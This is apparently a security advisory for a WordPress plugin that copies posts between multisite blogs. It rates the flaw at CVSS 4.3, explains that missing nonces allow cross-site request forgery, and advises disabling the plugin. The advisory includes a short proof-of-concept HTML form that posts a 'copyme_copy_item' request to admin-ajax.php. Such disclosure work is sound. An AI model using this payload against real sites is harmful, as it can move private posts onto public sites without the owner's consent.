CVSS Summary
| Score | 4.3 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | None |
| Integrity | Partial |
| Availability | None |
Last revised:
This plugin does not use nonces. Copying posts could allow taking a secret post from a non-public site within a multisite installation and moving it to a public site.
Current state: Reported
| Score | 4.3 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | None |
| Integrity | Partial |
| Availability | None |
Click submit and it’ll copy post with ID 1 to blog/site with ID 1:
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php"> <input type="text" name="action" value="copyme_copy_item"> <input type="text" name="id" value="1"> <input type="text" name="target" value="1"> <input type="submit"> </form>
Disable the plugin. No fixed version is known.